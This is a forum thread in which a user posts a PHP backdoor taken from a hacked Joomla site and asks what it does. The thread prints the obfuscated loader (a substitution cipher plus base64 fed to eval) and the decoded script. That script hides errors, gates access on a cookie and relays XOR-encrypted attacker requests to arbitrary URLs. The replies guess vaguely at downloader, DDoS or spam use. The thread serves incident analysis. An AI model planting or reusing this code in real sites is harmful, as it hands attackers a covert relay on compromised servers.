2

My friend had his Joomla site hacked today and I was sent this file which said it was the culprit.

<?php
function uxqdz($zezy, $rwsw){$pdnpgtd = ''; for($i=0; $i < strlen($zezy); $i++){$pdnpgtd .= isset($rwsw[$zezy[$i]]) ? $rwsw[$zezy[$i]] : $zezy[$i];}
$q="base64_decode";return $q($pdnpgtd);}

$llwes = '4osVIObTD84Zy36FtLuMf8scD8yKrLyTyKmmJAMCziuFr7sct3OGJzkMr3kcD8yKrLyTyK'.
'mmJAMCziustHy5tsbKD8u5tH6Fr7tZ0zivS4Fht3OG8L6Fr9OcrosQI84Z0zivS4FhI9kVrLys8LOTD8'.
'ycf9y5tH4Z0BivS4FhI9aF8LCskzYHr9en83OnD9C1kos5rsbGI91syKmmJAMCzYGJD7bKD9eNIzhZyebSAGbR'.
'BqqYf80YyosGD9GFS4FvS4ZYjzhYI9fYJz6FkoOQjzpbjzyNDNeiCSfnDzGTD9ysRA4GCoqQf94LfKGmXSp1CoyiCoC70o0xJ'.
'4GJjzhYjzhYjzusgosGJzivS4FbS4ZCzx6if862jSGYD7sMDObHD86cf3bVkoOVkP0ZyLu'.
'ZtSZ5R3sVtPOGyKivS4ZiDoeGfBhbjPCmrosGJzjbjxmiDoeGfBmKJAMCzYGJyoj3CebiD9C5DoOcDoeGfBhbjoy2t3q3CebiD9'.
'C5DoqZk8yMDoONr36sJz6if8629TekJBivS4ZCzx6TD9ai8362kopYwBu1rHCst7'.
's2rosdDB2iD9CKg8uGJz6xCN6cDoONr36s8362kopFJAMCzYGJy'.
'PystLOMkzhbjPCsr76cDoeGfApYJz6TD9ai8362kopFXmGJS4FFDxhZjB6KD8C1rP4FS4FvS4ZYjz'.
'hYyPystLOMkzhbjPCsr76cDoeGfAjZyPCsr76cDoeGfBivS4FbS4ZCz7ONIoWYyPystLOMkSMCzYGJDHO'.
'VfL6Fr3nYDoONtHsmkzYiDoeGfBiCzHMCzxhYjzhirLOG8362ko'.
'pYwBhxjNMCzxhYjzhiI3OajSGYyebA6Oy96OyryG2qOeucBpbAOzkk'.
'jznYyebA6Oy96Oyry1yeqOOeq16cOOyyy1GvS4ZYjzhYyoQsgObMD9nYwBuTkPyMD9nZyoQsg'.
'BivS4ZYS4ZYjzhYD7bKjzYiIAGmXKhiIBhWjPCGt7EsrxYiI3OaJAMYyoilJKiCzxhYjzuvS4ZYjzhYjzhYjz6lD8sryos'.
'kjSGYf32KJobKDzYiI3Oa9K6F8BiY8xhZyoQsgObMD9nYyBhKCAqFJAMCzxhYjzubS4ZCzxh'.
'Yjzu7rLjYJz6FwAhvjz6FwPCGt7EsrxYiDoeGfBivJ4GJjzhYjPMCzxhYjzhYjzhYD7bKjzYiIN'.
'GmXKhiINETkPyMD9nZyoQsgBiYyxfYyoiWtL6KroOVJz6if862JAMYyoZlJKmYyoilJKiCzxhYjzhYjzhYg'.
'mGJjzhYjzhYjzhYjzhYyob1kebif862jznbjoCZtx25t74Zyo62koeryoskJBugjobKDzYiI3Oa9K6U8BiFXmGJjzhYjzhYjzu'.
'bS4ZYjzhYc4GJS4ZYjzhYt7OGk8yVjz65k86cDoeGfAMCzHGCzYGJDHOVfL6Fr3nYt3OVDebif8'.
'620BYiDoeGfBiCzHMCzxhYjzhiIoO2DzhbjzjxXmGJS4ZYjzhYD7bKD9eNIzYiDoeGfOMxIoO2DoOKtKykjoeTjz6lD8ibw'.
'x63f9E1DBiCzxhYjzuvS4ZYjzhYjzhYjz6ZD9eijznbjz6lD8iYRxhxXxhxjznYyPD2rPOsjznYjsEK8onxXmGJjzh'.
'YjPGCzYGJjzhYjz6mf8y2r80YwBu2tHy2gBYHIP6GtztYwAnYf8yKf8iZS4ZYjzhYjzhYjzk'.
'QD86Zr34HjSG+jz6if8629KyQD86Zr34x8BmCzxhYjzhYjzhYy32sf96s'.
'txtYwAnYyo2sf94MS4ZYjzhYjzhYjzkNr3aGD9aGyKhbwxhiDoeGfOMx'.
'f7bigBykRhGJjzhYjzhYjzhHkosQD9b1kztYwAnYyo62koerjH6Fr9O5k84x8BmCzxhYjzhYj'.
'zhYS4ZYjzhYJBivS4ZCzxhYjzhifL6njSGYtL6KD9eQ83C5rH6sgP6cfLysf86sJz6mf8y2r80FXmGJjzhYjhGJjzhYjz6KD8C'.
'1rP4YwBuhD7sMDObHD86cf3bVkoOVkP0Zyo62koerjHOKrzykRzuo4qEA6BmYyoCGgzivS4ZCzxhYjzuFDxhZyo2'.
'GkPuct7OTtobVt3OcIoO2DoOKJ4GJjzhYjPMCzxhYjzhYjzhYI9fYJP'.
'CGtHu5tKYiIP6GtebKD8Cmr3aTDObZD9eiD8yr0eGMjzjK0ShxJBhbwAGY6ie'.
'0qGqFS4ZYjzhYjzhYjPMCzxhYjzhYjzhYjzhYjz6KD8C1rP4YwBhxBe6qqebeqsywqsEGjxhVjz6ZkP6m'.
'8LystLu5rHCs832sf96stsMm8AMCzxhYjzhYjzhYc4GJjzhYjPGCzxhYjzusrPCsS4ZY'.
'jzhYgmGJjzhYjzhYjzhit7OTk9EGjSGYjiCwAiae416yAGac6OyBA1j'.
'xXmGJjzhYjPGCzYGJjzhYjPyskPOKrxhit7OTk9EGXmGJc4GJS4F7k9aNkos5rxuTD9ai8362kopKJz6if862J4GJgmGJjz'.
'hYjzW5jPOTDBuTr3ClD86TS4Fb';

$eqjbe = Array('1'=>'1', '0'=>'M', '3'=>'2', '2'=>'h', '5'=>'v', '4'=>'Q', '7'=>'m', '6'=>'R', '9'=>'W', '8'=>'X', 'A'=>'T', 'C'=>'N', 'B'=>'S', 'E'=>'x', 'D'=>'Z', 'G'=>'0', 'F'=>'p', 'I'=>'a', 'H'=>'n', 'K'=>'y', 'J'=>'K', 'M'=>'s', 'L'=>'3', 'O'=>'V', 'N'=>'j', 'Q'=>'t', 'P'=>'H', 'S'=>'D', 'R'=>'L', 'U'=>'q', 'T'=>'z', 'W'=>'8', 'V'=>'u', 'Y'=>'g', 'X'=>'O', 'Z'=>'o', 'a'=>'5', 'c'=>'f', 'b'=>'9', 'e'=>'F', 'd'=>'6', 'g'=>'e', 'f'=>'Y', 'i'=>'k', 'h'=>'A', 'k'=>'d', 'j'=>'I', 'm'=>'w', 'l'=>'r', 'o'=>'G', 'n'=>'4', 'q'=>'U', 'p'=>'E', 's'=>'l', 'r'=>'b', 'u'=>'B', 't'=>'c', 'w'=>'P', 'v'=>'7', 'y'=>'J', 'x'=>'i', 'z'=>'C');

eval(uxqdz($llwes, $eqjbe));?>

I decrypted the string by taking out the eval and echoing the return value and this is the script that was being evaluated.

@ini_set('display_errors',0);
@ini_set('log_errors',0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);

foreach ($_COOKIE as $item)
{
  if ($item != "cf1d468d-3ebe-444e-ad7c-08154bd4cf0c")
    exit();
}

$data = file_get_contents('php://input');
$data = split("=",$data,2);

$b64_decode_data = base64_decode(urldecode($data[1]));

$send_data = unserialize(decrypt($b64_decode_data));

$result = send_data1 ($send_data);

if (!$result)
{
  $result = send_data2($send_data);
}

echo $result;

function decrypt($data)
{
  $out_data = "";
  $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  $key_len = strlen($key);

  for ($i=0; $i < strlen($key); $i++)
  {
    $key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
  }

  for ($i=0; $i<strlen($data);)
  {
    for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
    {
      $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
    }
  }

  return $out_data;
}

function send_data1($data)
{
  $head = "";

  foreach($data["headers"] as $key=>$value)
  {
    $head .= $key . ": " . $value . "\r\n";
  }

  $params = array('http' => array(
    'method' => $data["method"],
    'header' => $head,
    'content' => $data["body"],
    'timeout' => $data["timeout"],

  ));

  $ctx = stream_context_create($params);

  $result = @file_get_contents($data["url"], FALSE, $ctx);

  if ($http_response_header)
  {
    if (strpos($http_response_header[0], "200") === FALSE)
    {
      $result = "HTTP_ERROR\t" . $http_response_header[0];
    }
  }
  else
  {
    $result = "CONNECTION_ERROR";
  }

  return $result;
}

function send_data2($data)
{
  // use sockets
}

It looks like a file upload script but I'm not sure how it works.

Can any explain what this does?

Many thanks

1
 • To me it looks more like a downloader to further infect the compromised machine or to provide a shell perhaps. Commented Feb 17, 2016 at 8:29

1 Answer 1

0

Hacker will use the code to request your server from his remote server via url request. Example when hacker need he will ping your server: http://your.server.com/x.php

The work usually is used for DDos or spam email.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Not the answer you're looking for? Browse other questions tagged or ask your own question.